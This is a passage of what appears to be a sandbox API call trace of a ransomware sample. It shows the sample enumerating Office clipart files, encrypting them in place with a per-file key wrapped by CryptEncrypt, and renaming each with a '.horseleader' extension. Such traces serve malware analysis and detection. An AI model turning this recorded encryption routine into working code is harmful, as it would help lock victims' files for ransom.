returned 1 [0253.717] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.717] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.717] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.717] CloseHandle (hObject=0x158) returned 1 [0253.717] GetProcessHeap () returned 0x780000 [0253.717] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.717] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF.horseleader") returned 79 [0253.717] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf"), 
lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf.horseleader")) returned 1 [0253.718] GetProcessHeap () returned 0x780000 [0253.718] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.718] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23d7d700, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x23d7d700, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0x9b8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00442_.WMF", cAlternateFileName="")) returned 1 [0253.718] lstrcmpiW (lpString1="BS00442_.WMF", lpString2="Windows") returned -1 [0253.718] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 67 [0253.718] StrStrIW (lpFirst="BS00442_.WMF", lpSrch=".horseleader") returned 0x0 [0253.718] lstrcmpW (lpString1="BS00442_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.718] lstrcmpW (lpString1="BS00442_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.718] lstrlenW (lpString=".testttjffg") returned 11 [0253.719] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.719] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.719] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.719] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.719] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 67 [0253.720] StrStrW (lpFirst="BS00442_.WMF", lpSrch=".txt") returned 0x0 [0253.720] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2488) returned 1 [0253.720] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x9b8, lpOverlapped=0x0) returned 1 [0253.721] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff648, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.721] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x9b8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x9b8, lpOverlapped=0x0) returned 1 [0253.722] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.722] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.722] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.722] CloseHandle (hObject=0x158) returned 1 [0253.722] GetProcessHeap () returned 0x780000 [0253.722] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7dc820 [0253.722] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF.horseleader") returned 79 [0253.722] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf.horseleader")) returned 1 [0253.723] GetProcessHeap () returned 0x780000 [0253.723] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.723] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb7ffa00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbb7ffa00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x68c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00443_.WMF", cAlternateFileName="")) returned 1 [0253.723] lstrcmpiW (lpString1="BS00443_.WMF", lpString2="Windows") returned -1 [0253.723] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 67 [0253.723] StrStrIW (lpFirst="BS00443_.WMF", lpSrch=".horseleader") returned 0x0 [0253.723] lstrcmpW (lpString1="BS00443_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.723] lstrcmpW (lpString1="BS00443_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.723] lstrlenW (lpString=".testttjffg") returned 11 [0253.723] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF", 
lpSrch=".testttjffg") returned 0x0 [0253.723] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.723] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.724] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.724] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 67 [0253.724] StrStrW (lpFirst="BS00443_.WMF", lpSrch=".txt") returned 0x0 [0253.724] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1676) returned 1 [0253.724] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x68c, lpOverlapped=0x0) returned 1 [0253.727] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff974, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.727] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x68c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x68c, lpOverlapped=0x0) returned 1 [0253.727] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.727] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, 
lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.728] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.728] CloseHandle (hObject=0x158) returned 1 [0253.728] GetProcessHeap () returned 0x780000 [0253.728] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.728] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF.horseleader") returned 79 [0253.728] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf.horseleader")) returned 1 [0253.729] GetProcessHeap () returned 0x780000 [0253.729] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.729] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22a6aa00, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x22a6aa00, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0xf38, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00444_.WMF", cAlternateFileName="")) returned 1 [0253.729] lstrcmpiW (lpString1="BS00444_.WMF", lpString2="Windows") returned -1 [0253.729] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 67 [0253.729] StrStrIW (lpFirst="BS00444_.WMF", lpSrch=".horseleader") returned 0x0 [0253.729] lstrcmpW (lpString1="BS00444_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.729] lstrcmpW (lpString1="BS00444_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.729] lstrlenW (lpString=".testttjffg") returned 11 [0253.729] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.729] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.730] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.730] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.731] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 67 [0253.731] StrStrW (lpFirst="BS00444_.WMF", lpSrch=".txt") returned 0x0 [0253.731] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3896) returned 1 [0253.731] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xf38, lpOverlapped=0x0) returned 1 [0253.733] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff0c8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.733] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xf38, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xf38, lpOverlapped=0x0) returned 1 [0253.733] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.733] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.734] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.734] CloseHandle (hObject=0x158) returned 1 [0253.734] GetProcessHeap () returned 0x780000 [0253.734] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.734] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF.horseleader") returned 79 [0253.734] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf.horseleader")) returned 1 [0253.735] GetProcessHeap () returned 0x780000 [0253.735] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.735] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21757d00, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x600aeb50, 
ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x21757d00, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0xed4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00445_.WMF", cAlternateFileName="")) returned 1 [0253.735] lstrcmpiW (lpString1="BS00445_.WMF", lpString2="Windows") returned -1 [0253.735] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 67 [0253.735] StrStrIW (lpFirst="BS00445_.WMF", lpSrch=".horseleader") returned 0x0 [0253.735] lstrcmpW (lpString1="BS00445_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.735] lstrcmpW (lpString1="BS00445_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.735] lstrlenW (lpString=".testttjffg") returned 11 [0253.735] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.735] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.735] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.735] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.736] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 67 [0253.736] StrStrW (lpFirst="BS00445_.WMF", lpSrch=".txt") returned 0x0 [0253.736] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3796) returned 1 [0253.736] ReadFile (in: 
hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xed4, lpOverlapped=0x0) returned 1 [0253.738] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff12c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.738] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xed4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xed4, lpOverlapped=0x0) returned 1 [0253.738] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.738] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.738] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.738] CloseHandle (hObject=0x158) returned 1 [0253.738] GetProcessHeap () returned 0x780000 [0253.738] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.738] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF.horseleader") returned 79 [0253.738] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF.horseleader" (normalized: "c:\\program files\\microsoft 
office\\clipart\\pub60cor\\bs00445_.wmf.horseleader")) returned 1 [0253.740] GetProcessHeap () returned 0x780000 [0253.740] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.740] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x984, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00453_.WMF", cAlternateFileName="")) returned 1 [0253.740] lstrcmpiW (lpString1="BS00453_.WMF", lpString2="Windows") returned -1 [0253.740] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 67 [0253.740] StrStrIW (lpFirst="BS00453_.WMF", lpSrch=".horseleader") returned 0x0 [0253.740] lstrcmpW (lpString1="BS00453_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.740] lstrcmpW (lpString1="BS00453_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.740] lstrlenW (lpString=".testttjffg") returned 11 [0253.740] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.740] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.741] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.741] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.741] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 67 [0253.741] StrStrW (lpFirst="BS00453_.WMF", lpSrch=".txt") returned 0x0 [0253.741] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2436) returned 1 [0253.741] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x984, lpOverlapped=0x0) returned 1 [0253.744] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff67c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.744] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x984, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x984, lpOverlapped=0x0) returned 1 [0253.744] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.744] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.745] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.745] CloseHandle (hObject=0x158) returned 1 [0253.745] GetProcessHeap () returned 0x780000 [0253.745] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.745] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF.horseleader") returned 79 [0253.745] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf.horseleader")) returned 1 [0253.746] GetProcessHeap () returned 0x780000 [0253.746] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.746] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ba86700, ftCreationTime.dwHighDateTime=0x1bd4bea, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4ba86700, ftLastWriteTime.dwHighDateTime=0x1bd4bea, nFileSizeHigh=0x0, nFileSizeLow=0xaac, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS01080_.WMF", cAlternateFileName="")) returned 1 [0253.746] lstrcmpiW (lpString1="BS01080_.WMF", lpString2="Windows") returned -1 [0253.747] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 67 [0253.747] StrStrIW (lpFirst="BS01080_.WMF", lpSrch=".horseleader") returned 0x0 [0253.747] lstrcmpW (lpString1="BS01080_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.747] lstrcmpW 